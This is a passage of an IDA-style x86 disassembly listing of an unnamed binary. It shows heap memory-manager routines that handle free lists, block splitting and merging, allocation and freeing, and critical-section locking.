call sub_40113C
mov eax, offset dword_405610
call sub_40113C
mov eax, ds:dword_4055CC
test eax, eax
jz short loc_4018E7
loc_4018D0: ; CODE XREF: sub_40183C+A9�j
mov edx, [eax]
mov ds:dword_4055CC, edx
push eax
call sub_4010B4 ; LocalFree
mov eax, ds:dword_4055CC
test eax, eax
jnz short loc_4018D0
loc_4018E7: ; CODE XREF: sub_40183C+92�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401919
loc_4018F4: ; CODE XREF: sub_40183C+DB�j
cmp ds:byte_405035, 0
jz short loc_401907
push offset dword_4055B4
call sub_4010DC ; RtlLeaveCriticalSection
loc_401907: ; CODE XREF: sub_40183C+BF�j
push offset dword_4055B4
call sub_4010E4 ; RtlDeleteCriticalSection
retn
; ---------------------------------------------------------------------------
loc_401912: ; DATA XREF: sub_40183C+14�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_4018F4
; ---------------------------------------------------------------------------
loc_401919: ; CODE XREF: sub_40183C+B�j
; DATA XREF: sub_40183C+B3�o
pop ebx
pop ebp
retn
sub_40183C endp
; =============== S U B R O U T I N E =======================================
sub_40191C proc near ; CODE XREF: sub_401A2C:loc_401A8D�p
; sub_401A9C+23�p ...
push ebx
cmp eax, ds:dword_405600
jnz short loc_40192E
mov edx, [eax+4]
mov ds:dword_405600, edx
loc_40192E: ; CODE XREF: sub_40191C+7�j
mov edx, [eax+4]
mov ecx, [eax+8]
cmp ecx, 1000h
jg short loc_401974
cmp eax, edx
jnz short loc_401957
test ecx, ecx
jns short loc_401947
add ecx, 3
loc_401947: ; CODE XREF: sub_40191C+26�j
sar ecx, 2
mov eax, ds:dword_40560C
xor edx, edx
mov [eax+ecx*4-0Ch], edx
jmp short loc_40197B
; ---------------------------------------------------------------------------
loc_401957: ; CODE XREF: sub_40191C+22�j
test ecx, ecx
jns short loc_40195E
add ecx, 3
loc_40195E: ; CODE XREF: sub_40191C+3D�j
sar ecx, 2
mov ebx, ds:dword_40560C
mov [ebx+ecx*4-0Ch], edx
mov eax, [eax]
mov [edx], eax
mov [eax+4], edx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401974: ; CODE XREF: sub_40191C+1E�j
mov eax, [eax]
mov [edx], eax
mov [eax+4], edx
loc_40197B: ; CODE XREF: sub_40191C+39�j
pop ebx
retn
sub_40191C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401980 proc near ; CODE XREF: sub_401AD4+11�p
mov edx, ds:dword_405610
jmp short loc_401998
; ---------------------------------------------------------------------------
loc_401988: ; CODE XREF: sub_401980+1E�j
mov ecx, [edx+8]
cmp eax, ecx
jb short loc_401996
add ecx, [edx+0Ch]
cmp eax, ecx
jb short loc_4019AC
loc_401996: ; CODE XREF: sub_401980+D�j
mov edx, [edx]
loc_401998: ; CODE XREF: sub_401980+6�j
cmp edx, offset dword_405610
jnz short loc_401988
mov ds:dword_4055B0, 3
xor edx, edx
loc_4019AC: ; CODE XREF: sub_401980+14�j
mov eax, edx
retn
sub_401980 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4019B0 proc near ; CODE XREF: sub_401AD4+74�p
; sub_401C58+68�p
push ebx
mov ecx, edx
sub ecx, 4
lea ebx, [ecx+eax]
cmp edx, 10h
jl short loc_4019CD
mov dword ptr [ebx], 80000007h
mov edx, ecx
call sub_401B84
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4019CD: ; CODE XREF: sub_4019B0+C�j
cmp edx, 4
jl short loc_4019DE
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
mov [ebx], ecx
loc_4019DE: ; CODE XREF: sub_4019B0+20�j
pop ebx
retn
sub_4019B0 endp
; =============== S U B R O U T I N E =======================================
sub_4019E0 proc near ; CODE XREF: sub_401A04+D�p
; sub_401C0C+36�p ...
inc ds:dword_40559C
mov edx, eax
sub edx, 4
mov edx, [edx]
and edx, 7FFFFFFCh
sub edx, 4
add ds:dword_4055A0, edx
call sub_401FF4
retn
sub_4019E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401A04 proc near ; CODE XREF: sub_401AD4+8E�p
cmp edx, 0Ch
jl short loc_401A17
or edx, 2
mov [eax], edx
add eax, 4
call sub_4019E0
retn
; ---------------------------------------------------------------------------
loc_401A17: ; CODE XREF: sub_401A04+3�j
cmp edx, 4
jl short loc_401A26
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
loc_401A26: ; CODE XREF: sub_401A04+16�j
add eax, edx
and dword ptr [eax], 0FFFFFFFEh
retn
sub_401A04 endp
; =============== S U B R O U T I N E =======================================
sub_401A2C proc near ; CODE XREF: sub_401C58+36�p
push ebx
push esi
mov edx, eax
sub edx, 4
mov edx, [edx]
mov ecx, edx
and ecx, 80000002h
cmp ecx, 80000002h
jz short loc_401A4F
mov ds:dword_4055B0, 4
loc_401A4F: ; CODE XREF: sub_401A2C+17�j
mov ebx, edx
and ebx, 7FFFFFFCh
sub eax, ebx
mov ecx, eax
xor edx, [ecx]
test edx, 0FFFFFFFEh
jz short loc_401A6F
mov ds:dword_4055B0, 5
loc_401A6F: ; CODE XREF: sub_401A2C+37�j
test byte ptr [ecx], 1
jz short loc_401A94
mov edx, eax
sub edx, 0Ch
mov esi, [edx+8]
sub eax, esi
cmp esi, [eax+8]
jz short loc_401A8D
mov ds:dword_4055B0, 6
loc_401A8D: ; CODE XREF: sub_401A2C+55�j
call sub_40191C
add ebx, esi
loc_401A94: ; CODE XREF: sub_401A2C+46�j
mov eax, ebx
pop esi
pop ebx
retn
sub_401A2C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401A9C proc near ; CODE XREF: sub_401C58+4F�p
push ebx
push esi
push edi
mov ebx, eax
xor edi, edi
mov eax, [ebx]
test eax, 80000000h
jz short loc_401AB7
and eax, 7FFFFFFCh
add edi, eax
add ebx, eax
mov eax, [ebx]
loc_401AB7: ; CODE XREF: sub_401A9C+E�j
test al, 2
jnz short loc_401ACE
mov esi, ebx
mov eax, esi
call sub_40191C
mov eax, [esi+8]
add edi, eax
add ebx, eax
and dword ptr [ebx], 0FFFFFFFEh
loc_401ACE: ; CODE XREF: sub_401A9C+1D�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_401A9C endp
; =============== S U B R O U T I N E =======================================
sub_401AD4 proc near ; CODE XREF: sub_401B84+61�p
var_1C = byte ptr -1Ch
var_1B = dword ptr -1Bh
var_17 = dword ptr -17h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov edi, edx
mov esi, eax
mov [esp+1Ch+var_1C], 0
mov eax, esi
call sub_401980
mov ebx, eax
test ebx, ebx
jz loc_401B76
mov ebp, [ebx+8]
mov eax, ebp
add eax, [ebx+0Ch]
mov edx, eax
lea ecx, [edi+esi]
sub edx, ecx
cmp edx, 0Ch
jg short loc_401B0C
mov edi, eax
sub edi, esi
loc_401B0C: ; CODE XREF: sub_401AD4+32�j
mov eax, esi
sub eax, ebp
cmp eax, 0Ch
jge short loc_401B29
lea ecx, [esp+1Ch+var_1B]
mov edx, esi
sub edx, [ebx+8]
add edx, edi
mov eax, ebp
call sub_4016EC
jmp short loc_401B3A
; ---------------------------------------------------------------------------
loc_401B29: ; CODE XREF: sub_401AD4+3F�j
lea ecx, [esp+1Ch+var_1B]
mov edx, edi
sub edx, 4
lea eax, [esi+4]
call sub_4016EC
loc_401B3A: ; CODE XREF: sub_401AD4+53�j
mov ebp, [esp+1Ch+var_1B]
test ebp, ebp
jz short loc_401B76
mov edx, ebp
sub edx, esi
mov eax, esi
call sub_4019B0
mov eax, ebp
add eax, [esp+1Ch+var_17]
mov edx, [ebx+8]
add edx, [ebx+0Ch]
cmp eax, edx
jnb short loc_401B67
lea edx, [edi+esi]
sub edx, eax
call sub_401A04
loc_401B67: ; CODE XREF: sub_401AD4+87�j
lea edx, [esp+1Ch+var_1B]
mov eax, ebx
call sub_4011FC
mov [esp+1Ch+var_1C], 1
loc_401B76: ; CODE XREF: sub_401AD4+1A�j
; sub_401AD4+6C�j
mov al, [esp+1Ch+var_1C]
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401AD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B84 proc near ; CODE XREF: sub_4019B0+16�p
; sub_401D70+BB�p ...
push ebx
push esi
push edi
mov esi, edx
mov edi, eax
mov ebx, edi
mov [ebx+8], esi
mov eax, ebx
add eax, esi
sub eax, 0Ch
mov [eax+8], esi
cmp esi, 1000h
jg short loc_401BD9
mov edx, esi
test edx, edx
jns short loc_401BAB
add edx, 3
loc_401BAB: ; CODE XREF: sub_401B84+22�j
sar edx, 2
mov eax, ds:dword_40560C
mov eax, [eax+edx*4-0Ch]
test eax, eax
jnz short loc_401BCB
mov eax, ds:dword_40560C
mov [eax+edx*4-0Ch], ebx
mov [ebx+4], ebx
mov [ebx], ebx
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BCB: ; CODE XREF: sub_401B84+35�j
mov edx, [eax]
mov [ebx+4], eax
mov [ebx], edx
mov [eax], ebx
mov [edx+4], ebx
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BD9: ; CODE XREF: sub_401B84+1C�j
cmp esi, 3C00h
jl short loc_401BEE
mov edx, esi
mov eax, edi
call sub_401AD4
test al, al
jnz short loc_401C05
loc_401BEE: ; CODE XREF: sub_401B84+5B�j
mov eax, ds:dword_405600
mov ds:dword_405600, ebx
mov edx, [eax]
mov [ebx+4], eax
mov [ebx], edx
mov [eax], ebx
mov [edx+4], ebx
loc_401C05: ; CODE XREF: sub_401B84+45�j
; sub_401B84+53�j ...
pop edi
pop esi
pop ebx
retn
sub_401B84 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401C0C proc near ; CODE XREF: sub_401C58+F�p
; sub_401FF4+100�p ...
cmp ds:dword_405604, 0
jle short locret_401C55
cmp ds:dword_405604, 0Ch
jge short loc_401C2A
mov ds:dword_4055B0, 7
jmp short locret_401C55
; ---------------------------------------------------------------------------
loc_401C2A: ; CODE XREF: sub_401C0C+10�j
mov eax, ds:dword_405604
or eax, 2
mov edx, ds:dword_405608
mov [edx], eax
mov eax, ds:dword_405608
add eax, 4
call sub_4019E0
xor eax, eax
mov ds:dword_405608, eax
xor eax, eax
mov ds:dword_405604, eax
locret_401C55: ; CODE XREF: sub_401C0C+7�j
; sub_401C0C+1C�j
retn
sub_401C0C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401C58 proc near ; CODE XREF: sub_401CE4+18�p
; sub_401D10+1D�p
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFF0h
mov esi, eax
lea edi, [esp+1Ch+var_1C]
movsd
movsd
mov edi, esp
call sub_401C0C
lea ecx, [esp+1Ch+var_14]
mov edx, edi
mov eax, offset dword_405610
call sub_40118C
mov ebx, [esp+1Ch+var_14]
test ebx, ebx
jnz short loc_401C88
xor eax, eax
jmp short loc_401CDA
; ---------------------------------------------------------------------------
loc_401C88: ; CODE XREF: sub_401C58+2A�j
mov eax, [edi]
cmp ebx, eax
jnb short loc_401C98
call sub_401A2C
sub [edi], eax
add [edi+4], eax
loc_401C98: ; CODE XREF: sub_401C58+34�j
mov eax, [edi]
add eax, [edi+4]
mov esi, ebx
add esi, [esp+1Ch+var_10]
cmp eax, esi
jnb short loc_401CAF
call sub_401A9C
add [edi+4], eax
loc_401CAF: ; CODE XREF: sub_401C58+4D�j
mov eax, [edi]
add eax, [edi+4]
cmp esi, eax
jnz short loc_401CC9
sub eax, 4
mov edx, 4
call sub_4019B0
sub dword ptr [edi+4], 4
loc_401CC9: ; CODE XREF: sub_401C58+5E�j
mov eax, [edi]
mov ds:dword_405608, eax
mov eax, [edi+4]
mov ds:dword_405604, eax
mov al, 1
loc_401CDA: ; CODE XREF: sub_401C58+2E�j
add esp, 10h
pop edi
pop esi
pop ebx
retn
sub_401C58 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401CE4 proc near ; CODE XREF: sub_401D70+57�p
var_C = dword ptr -0Ch
push ebx
add esp, 0FFFFFFF8h
mov ebx, eax
mov edx, esp
lea eax, [ebx+4]
call sub_401538
cmp [esp+0Ch+var_C], 0
jz short loc_401D05
mov eax, esp
call sub_401C58
test al, al
jnz short loc_401D09
loc_401D05: ; CODE XREF: sub_401CE4+14�j
xor eax, eax
jmp short loc_401D0B
; ---------------------------------------------------------------------------
loc_401D09: ; CODE XREF: sub_401CE4+1F�j
mov al, 1
loc_401D0B: ; CODE XREF: sub_401CE4+23�j
pop ecx
pop edx
pop ebx
retn
sub_401CE4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D10 proc near ; CODE XREF: sub_402198+1A4�p
var_10 = dword ptr -10h
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
mov ecx, esp
lea edx, [esi+4]
mov eax, ebx
call sub_4015C8
cmp [esp+10h+var_10], 0
jz short loc_401D36
mov eax, esp
call sub_401C58
test al, al
jnz short loc_401D3A
loc_401D36: ; CODE XREF: sub_401D10+19�j
xor eax, eax
jmp short loc_401D3C
; ---------------------------------------------------------------------------
loc_401D3A: ; CODE XREF: sub_401D10+24�j
mov al, 1
loc_401D3C: ; CODE XREF: sub_401D10+28�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_401D10 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401D44 proc near ; CODE XREF: sub_401D70+4A�p
xor edx, edx
test eax, eax
jns short loc_401D4D
add eax, 3
loc_401D4D: ; CODE XREF: sub_401D44+4�j
sar eax, 2
cmp eax, 400h
jg short loc_401D6D
loc_401D57: ; CODE XREF: sub_401D44+27�j
mov edx, ds:dword_40560C
mov edx, [edx+eax*4-0Ch]
test edx, edx
jnz short loc_401D6D
inc eax
cmp eax, 401h
jnz short loc_401D57
loc_401D6D: ; CODE XREF: sub_401D44+11�j
; sub_401D44+1F�j
mov eax, edx
retn
sub_401D44 endp
; =============== S U B R O U T I N E =======================================
sub_401D70 proc near ; CODE XREF: sub_401E64+153�p
push ebx
push esi
push edi
push ebp
mov esi, eax
mov edi, offset dword_405600
mov ebp, offset dword_405604
loc_401D80: ; CODE XREF: sub_401D70+6A�j
mov ebx, ds:dword_4055F8
cmp esi, [ebx+8]
jle loc_401E13
mov ebx, [edi]
mov eax, [ebx+8]
cmp esi, eax
jle short loc_401E13
mov [ebx+8], esi
loc_401D9B: ; CODE XREF: sub_401D70+31�j
mov ebx, [ebx+4]
cmp esi, [ebx+8]
jg short loc_401D9B
mov edx, [edi]
mov [edx+8], eax
cmp ebx, [edi]
jz short loc_401DB0
mov [edi], ebx
jmp short loc_401E13
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: sub_401D70+3A�j
cmp esi, 1000h
jg short loc_401DC5
mov eax, esi
call sub_401D44
mov ebx, eax
test ebx, ebx
jnz short loc_401E13
loc_401DC5: ; CODE XREF: sub_401D70+46�j
mov eax, esi
call sub_401CE4
test al, al
jnz short loc_401DD7
xor eax, eax
jmp loc_401E5F
; ---------------------------------------------------------------------------
loc_401DD7: ; CODE XREF: sub_401D70+5E�j
cmp esi, [ebp+0]
jg short loc_401D80
sub [ebp+0], esi
cmp dword ptr [ebp+0], 0Ch
jge short loc_401DED
add esi, [ebp+0]
xor eax, eax
mov [ebp+0], eax
loc_401DED: ; CODE XREF: sub_401D70+73�j
mov eax, ds:dword_405608
add ds:dword_405608, esi
mov edx, esi
or edx, 2
mov [eax], edx
add eax, 4
inc ds:dword_40559C
sub esi, 4
add ds:dword_4055A0, esi
jmp short loc_401E5F
; ---------------------------------------------------------------------------
loc_401E13: ; CODE XREF: sub_401D70+19�j
; sub_401D70+26�j ...
mov eax, ebx
call sub_40191C
mov edx, [ebx+8]
mov eax, edx
sub eax, esi
cmp eax, 0Ch
jl short loc_401E32
mov edx, ebx
add edx, esi
xchg eax, edx
call sub_401B84
jmp short loc_401E44
; ---------------------------------------------------------------------------
loc_401E32: ; CODE XREF: sub_401D70+B4�j
mov esi, edx
cmp ebx, [edi]
jnz short loc_401E3D
mov eax, [ebx+4]
mov [edi], eax
loc_401E3D: ; CODE XREF: sub_401D70+C6�j
mov eax, ebx
add eax, esi
and dword ptr [eax], 0FFFFFFFEh
loc_401E44: ; CODE XREF: sub_401D70+C0�j
mov eax, ebx
mov edx, esi
or edx, 2
mov [eax], edx
add eax, 4
inc ds:dword_40559C
sub esi, 4
add ds:dword_4055A0, esi
loc_401E5F: ; CODE XREF: sub_401D70+62�j
; sub_401D70+A1�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401D70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E64 proc near ; CODE XREF: sub_402374+5C�p
; sub_402438+5�p
; DATA XREF: ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov ebx, eax
cmp ds:byte_4055AC, 0
jnz short loc_401E81
call sub_401778
test al, al
jz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E64+12�j
cmp ebx, 7FFFFFF8h
jle short loc_401E93
loc_401E89: ; CODE XREF: sub_401E64+1B�j
xor eax, eax
mov [ebp+var_4], eax
jmp loc_401FE7
; ---------------------------------------------------------------------------
loc_401E93: ; CODE XREF: sub_401E64+23�j
xor ecx, ecx
push ebp
push offset loc_401FE0
push dword ptr fs:[ecx]
mov fs:[ecx], esp
cmp ds:byte_405035, 0
jz short loc_401EB4
push offset dword_4055B4
call sub_4010D4 ; RtlEnterCriticalSection
loc_401EB4: ; CODE XREF: sub_401E64+44�j
add ebx, 7
and ebx, 0FFFFFFFCh
cmp ebx, 0Ch
jge short loc_401EC4
mov ebx, 0Ch
loc_401EC4: ; CODE XREF: sub_401E64+59�j
cmp ebx, 1000h
jg loc_401F63
mov eax, ebx
test eax, eax
jns short loc_401ED9
add eax, 3
loc_401ED9: ; CODE XREF: sub_401E64+70�j
sar eax, 2
mov edx, ds:dword_40560C
mov edx, [edx+eax*4-0Ch]
test edx, edx
jz short loc_401F63
mov esi, edx
mov eax, esi
add eax, ebx
and dword ptr [eax], 0FFFFFFFEh
mov eax, [edx+4]
cmp edx, eax
jnz short loc_401F14
mov eax, ebx
test eax, eax
jns short loc_401F03
add eax, 3
loc_401F03: ; CODE XREF: sub_401E64+9A�j
sar eax, 2
mov ecx, ds:dword_40560C
xor edi, edi
mov [ecx+eax*4-0Ch], edi
jmp short loc_401F3A
; ---------------------------------------------------------------------------
loc_401F14: ; CODE XREF: sub_401E64+94�j
mov ecx, ebx
test ecx, ecx
jns short loc_401F1D
add ecx, 3
loc_401F1D: ; CODE XREF: sub_401E64+B4�j
sar ecx, 2
mov edi, ds:dword_40560C
mov [edi+ecx*4-0Ch], eax
mov ecx, [edx]
mov [ebp+var_8], ecx
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov ecx, [ebp+var_8]
mov [eax], ecx
loc_401F3A: ; CODE XREF: sub_401E64+AE�j
mov eax, esi
mov edx, [edx+8]
or edx, 2
mov [eax], edx
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_40559C
sub ebx, 4
add ds:dword_4055A0, ebx
call sub_402A44
jmp loc_401FE7
; ---------------------------------------------------------------------------
loc_401F63: ; CODE XREF: sub_401E64+66�j
; sub_401E64+84�j
cmp ebx, ds:dword_405604
jg short loc_401FB5
sub ds:dword_405604, ebx
cmp ds:dword_405604, 0Ch
jge short loc_401F87
add ebx, ds:dword_405604
xor eax, eax
mov ds:dword_405604, eax
loc_401F87: ; CODE XREF: sub_401E64+114�j
mov eax, ds:dword_405608
add ds:dword_405608, ebx
mov edx, ebx
or edx, 2
mov [eax], edx
add eax, 4
mov [ebp+var_4], eax
inc ds:dword_40559C
sub ebx, 4
add ds:dword_4055A0, ebx
call sub_402A44
jmp short loc_401FE7
; ---------------------------------------------------------------------------
loc_401FB5: ; CODE XREF: sub_401E64+105�j
mov eax, ebx
call sub_401D70
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401FE7
loc_401FCC: ; CODE XREF: sub_401E64+181�j
cmp ds:byte_405035, 0
jz short locret_401FDF
push offset dword_4055B4
call sub_4010DC ; RtlLeaveCriticalSection
locret_401FDF: ; CODE XREF: sub_401E64+16F�j
retn
; ---------------------------------------------------------------------------
loc_401FE0: ; DATA XREF: sub_401E64+32�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_401FCC
; ---------------------------------------------------------------------------
loc_401FE7: ; CODE XREF: sub_401E64+2A�j
; sub_401E64+FA�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_401E64 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FF4 proc near ; CODE XREF: sub_4019E0+1C�p
; sub_402374+88�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, eax
xor eax, eax
mov ds:dword_4055B0, eax
cmp ds:byte_4055AC, 0
jnz short loc_40202C
call sub_401778
test al, al
jnz short loc_40202C
mov ds:dword_4055B0, 8
mov [ebp+var_4], 8
jmp loc_40218D
; ---------------------------------------------------------------------------
loc_40202C: ; CODE XREF: sub_401FF4+17�j
; sub_401FF4+20�j
xor ecx, ecx
push ebp
push offset loc_402186
push dword ptr fs:[ecx]
mov fs:[ecx], esp
cmp ds:byte_405035, 0
jz short loc_40204D
push offset dword_4055B4
call sub_4010D4 ; RtlEnterCriticalSection
loc_40204D: ; CODE XREF: sub_401FF4+4D�j
mov esi, ebx
sub esi, 4
mov ebx, [esi]
test bl, 2
jnz short loc_402068
mov ds:dword_4055B0, 9
jmp loc_40215D
; ---------------------------------------------------------------------------
loc_402068: ; CODE XREF: sub_401FF4+63�j
dec ds:dword_40559C
mov eax, ebx
and eax, 7FFFFFFCh
sub eax, 4
sub ds:dword_4055A0, eax
test bl, 1
jz short loc_4020C8
mov eax, esi
sub eax, 0Ch
mov edx, [eax+8]
cmp edx, 0Ch
jl short loc_402098
test edx, 80000003h
jz short loc_4020A7
loc_402098: ; CODE XREF: sub_401FF4+9A�j
mov ds:dword_4055B0, 0Ah
jmp loc_40215D
; ---------------------------------------------------------------------------
loc_4020A7: ; CODE XREF: sub_401FF4+A2�j
mov eax, esi
sub eax, edx
cmp edx, [eax+8]
jz short loc_4020BF
mov ds:dword_4055B0, 0Ah
jmp loc_40215D
; ---------------------------------------------------------------------------
loc_4020BF: ; CODE XREF: sub_401FF4+BA�j
add ebx, edx
mov esi, eax
call sub_40191C
loc_4020C8: ; CODE XREF: sub_401FF4+8D�j
and ebx, 7FFFFFFCh
mov eax, esi
add eax, ebx
mov edi, eax
cmp edi, ds:dword_405608
jnz short loc_402108
sub ds:dword_405608, ebx
add ds:dword_405604, ebx
cmp ds:dword_405604, 3C00h
jle short loc_4020F9
call sub_401C0C
loc_4020F9: ; CODE XREF: sub_401FF4+FE�j
xor eax, eax
mov [ebp+var_4], eax
call sub_402A44
jmp loc_40218D
; ---------------------------------------------------------------------------
loc_402108: ; CODE XREF: sub_401FF4+E6�j
mov edx, [eax]
test dl, 2
jz short loc_40212B
and edx, 7FFFFFFCh
cmp edx, 4
jge short loc_402126
mov ds:dword_4055B0, 0Bh
jmp short loc_40215D
; ---------------------------------------------------------------------------
loc_402126: ; CODE XREF: sub_401FF4+124�j
or dword ptr [eax], 1
jmp short loc_402154
; ---------------------------------------------------------------------------
loc_40212B: ; CODE XREF: sub_401FF4+119�j
mov eax, edi
cmp dword ptr [eax+4], 0
jz short loc_40213E
cmp dword ptr [eax], 0
jz short loc_40213E
cmp dword ptr [eax+8], 0Ch
jge short loc_40214A
loc_40213E: ; CODE XREF: sub_401FF4+13D�j
; sub_401FF4+142�j
mov ds:dword_4055B0, 0Bh
jmp short loc_40215D
; ---------------------------------------------------------------------------
loc_40214A: ; CODE XREF: sub_401FF4+148�j
mov edx, [eax+8]
add ebx, edx
call sub_40191C
loc_402154: ; CODE XREF: sub_401FF4+135�j
mov edx, ebx
mov eax, esi
call sub_401B84
loc_40215D: ; CODE XREF: sub_401FF4+6F�j
; sub_401FF4+AE�j ...
mov eax, ds:dword_4055B0
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40218D
loc_402172: ; CODE XREF: sub_401FF4+197�j
cmp ds:byte_405035, 0
jz short locret_402185
push offset dword_4055B4
call sub_4010DC ; RtlLeaveCriticalSection
locret_402185: ; CODE XREF: sub_401FF4+185�j
retn
; ---------------------------------------------------------------------------
loc_402186: ; DATA XREF: sub_401FF4+3B�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_402172
; ---------------------------------------------------------------------------
loc_40218D: ; CODE XREF: sub_401FF4+33�j
; sub_401FF4+10F�j
; DATA XREF: ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_401FF4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402198 proc near ; CODE XREF: sub_402374+4C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov esi, edx
add esi, 7
and esi, 0FFFFFFFCh
cmp esi, 0Ch
jge short loc_4021B1
mov esi, 0Ch
loc_4021B1: ; CODE XREF: sub_402198+12�j
mov ebp, eax
sub ebp, 4
mov edi, [ebp+0]
and edi, 7FFFFFFCh
mov eax, ebp
add eax, edi
mov ebx, eax
cmp edi, esi
jnz short loc_4021D0
mov al, 1
jmp loc_40236B
; ---------------------------------------------------------------------------
loc_4021D0: ; CODE XREF: sub_402198+2F�j
cmp edi, esi
jle loc_40225B
mov edx, edi
sub edx, esi
mov [esp+18h+var_18], edx
cmp ebx, ds:dword_405608
jnz short loc_40221F
mov eax, [esp+18h+var_18]
sub ds:dword_405608, eax
mov eax, [esp+18h+var_18]
add ds:dword_405604, eax
cmp ds:dword_405604, 0Ch
jge loc_402352
mov eax, [esp+18h+var_18]
add ds:dword_405608, eax
mov eax, [esp+18h+var_18]
sub ds:dword_405604, eax
mov esi, edi
jmp loc_402352
; ---------------------------------------------------------------------------
loc_40221F: ; CODE XREF: sub_402198+4D�j
mov ebx, eax
test byte ptr [ebx], 2
jnz short loc_402233
mov eax, ebx
mov edx, [eax+8]
add [esp+18h+var_18], edx
call sub_40191C
loc_402233: ; CODE XREF: sub_402198+8C�j
cmp [esp+18h+var_18], 0Ch
jl short loc_402254
mov ebx, ebp
add ebx, esi
mov eax, [esp+18h+var_18]
or eax, 2
mov [ebx], eax
mov eax, ebx
add eax, 4
call sub_4019E0
jmp loc_402352
; ---------------------------------------------------------------------------
loc_402254: ; CODE XREF: sub_402198+9F�j
mov esi, edi
jmp loc_402352
; ---------------------------------------------------------------------------
loc_40225B: ; CODE XREF: sub_402198+3A�j
; sub_402198+1B1�j
mov eax, esi
sub eax, edi
mov [esp+18h+var_14], eax
cmp ebx, ds:dword_405608
jnz short loc_4022D2
mov eax, ds:dword_405604
cmp eax, [esp+18h+var_14]
jl short loc_4022C9
mov eax, [esp+18h+var_14]
sub ds:dword_405604, eax
mov eax, [esp+18h+var_14]
add ds:dword_405608, eax
cmp ds:dword_405604, 0Ch
jge short loc_4022AB
mov eax, ds:dword_405604
add ds:dword_405608, eax
add esi, ds:dword_405604
xor eax, eax
mov ds:dword_405604, eax
loc_4022AB: ; CODE XREF: sub_402198+F9�j
mov eax, esi
sub eax, edi
add ds:dword_4055A0, eax
mov eax, [ebp+0]
and eax, 80000003h
or esi, eax
mov [ebp+0], esi
mov al, 1
jmp loc_40236B
; ---------------------------------------------------------------------------
loc_4022C9: ; CODE XREF: sub_402198+DC�j
call sub_401C0C
mov ebx, ebp
add ebx, edi
loc_4022D2: ; CODE XREF: sub_402198+D1�j
test byte ptr [ebx], 2
jnz short loc_402324
mov edx, ebx
mov eax, edx
mov ecx, [eax+8]
mov [esp+18h+var_18], ecx
mov ecx, [esp+18h+var_18]
cmp ecx, [esp+18h+var_14]
jge short loc_4022F8
add edx, [esp+18h+var_18]
mov ebx, edx
mov eax, [esp+18h+var_18]
sub [esp+18h+var_14], eax
jmp short loc_402324
; ---------------------------------------------------------------------------
loc_4022F8: ; CODE XREF: sub_402198+150�j
call sub_40191C
mov eax, [esp+18h+var_14]
sub [esp+18h+var_18], eax
cmp [esp+18h+var_18], 0Ch
jl short loc_402318
mov eax, ebp
add eax, esi
mov edx, [esp+18h+var_18]
call sub_401B84
jmp short loc_402352
; ---------------------------------------------------------------------------
loc_402318: ; CODE XREF: sub_402198+170�j
add esi, [esp+18h+var_18]
mov ebx, ebp
add ebx, esi
and dword ptr [ebx], 0FFFFFFFEh
jmp short loc_402352
; ---------------------------------------------------------------------------
loc_402324: ; CODE XREF: sub_402198+13D�j
; sub_402198+15E�j
mov eax, [ebx]
test eax, 80000000h
jz short loc_40234E
and eax, 7FFFFFFCh
add eax, ebx
mov ebx, eax
mov edx, [esp+18h+var_14]
mov eax, ebx
call sub_401D10
test al, al
jz short loc_40234E
mov ebx, ebp
add ebx, edi
jmp loc_40225B
